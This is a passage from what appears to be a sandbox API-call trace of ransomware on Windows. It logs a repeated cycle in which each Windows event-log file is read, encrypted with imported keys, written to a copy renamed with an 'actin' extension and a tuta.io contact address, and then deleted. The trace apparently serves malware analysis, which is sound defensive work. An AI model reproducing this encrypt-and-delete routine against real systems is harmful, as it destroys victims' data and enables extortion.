Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xb0, dwBufLen=0xb0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xb0) returned 1 [0062.477] CryptDestroyKey (hKey=0xf71b00) returned 1 [0062.477] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x162, lpOverlapped=0x0) returned 1 [0062.477] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0062.477] CloseHandle (hObject=0x300) returned 1 [0062.477] CloseHandle (hObject=0x328) returned 1 [0062.479] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx")) returned 1 [0062.480] SetEvent (hEvent=0x2e8) returned 1 [0062.481] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.481] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.481] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.481] CloseHandle (hObject=0x328) returned 1 [0062.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 0x20 [0062.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.481] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.481] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.481] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.481] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.482] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d80) returned 1 [0062.482] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.482] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.483] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.483] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.485] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0062.485] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.485] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0062.485] CryptDestroyKey (hKey=0xf71a00) returned 1 [0062.485] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0062.485] CryptDestroyKey (hKey=0xf71d80) returned 1 [0062.485] CloseHandle (hObject=0x328) returned 1 [0062.485] CloseHandle (hObject=0x300) returned 1 [0062.487] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 1 [0062.488] SetEvent (hEvent=0x2e8) returned 1 [0062.488] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.488] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.489] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.489] CloseHandle (hObject=0x300) returned 1 [0062.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 0x20 [0062.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.489] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.489] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.489] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.489] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.489] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e80) returned 1 [0062.489] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.489] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.492] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.492] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.494] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e40) returned 1 [0062.494] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.494] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0062.494] CryptDestroyKey (hKey=0xf71e40) returned 1 [0062.494] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0062.494] CryptDestroyKey (hKey=0xf71e80) returned 1 [0062.494] CloseHandle (hObject=0x300) returned 1 [0062.494] CloseHandle (hObject=0x328) returned 1 [0062.496] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx")) returned 1 [0062.497] SetEvent (hEvent=0x2e8) returned 1 [0062.497] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.497] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.498] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.498] CloseHandle (hObject=0x328) returned 1 [0062.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 0x20 [0062.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.498] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.498] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.498] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.498] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.500] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0062.500] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.500] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.501] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.501] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.503] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e40) returned 1 [0062.503] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.503] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0, dwBufLen=0xa0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0) returned 1 [0062.503] CryptDestroyKey (hKey=0xf71e40) returned 1 [0062.503] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x152, lpOverlapped=0x0) returned 1 [0062.503] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0062.503] CloseHandle (hObject=0x328) returned 1 [0062.503] CloseHandle (hObject=0x300) returned 1 [0062.506] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 1 [0062.507] SetEvent (hEvent=0x2e8) returned 1 [0062.507] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.507] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.507] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.507] CloseHandle (hObject=0x300) returned 1 [0062.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 0x20 [0062.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.508] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0062.508] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.508] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.508] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0062.510] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d00) returned 1 [0062.510] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.510] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.709] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.709] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.711] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0062.711] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.711] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0062.711] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0062.711] WriteFile (in: hFile=0x328, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0062.711] CryptDestroyKey (hKey=0xf71d00) returned 1 [0062.711] CloseHandle (hObject=0x300) returned 1 [0062.711] CloseHandle (hObject=0x328) returned 1 [0062.974] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx")) returned 1 [0062.975] SetEvent (hEvent=0x2e8) returned 1 [0062.976] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.976] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.976] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.976] CloseHandle (hObject=0x2e4) returned 1 [0062.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 0x20 [0062.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.976] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.976] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.976] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.976] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.977] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0062.977] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.977] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0062.979] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0062.979] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0062.981] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0062.981] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0062.981] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0062.981] CryptDestroyKey (hKey=0xf71b80) returned 1 [0062.981] WriteFile (in: hFile=0x344, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0062.981] CryptDestroyKey (hKey=0xf71b00) returned 1 [0062.981] CloseHandle (hObject=0x2e4) returned 1 [0062.981] CloseHandle (hObject=0x344) returned 1 [0062.983] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx")) returned 1 [0062.984] SetEvent (hEvent=0x2e8) returned 1 [0062.984] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0062.984] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.985] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0062.985] CloseHandle (hObject=0x344) returned 1 [0062.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx")) returned 0x20 [0062.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.985] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.985] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.985] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0062.985] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.985] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0062.985] 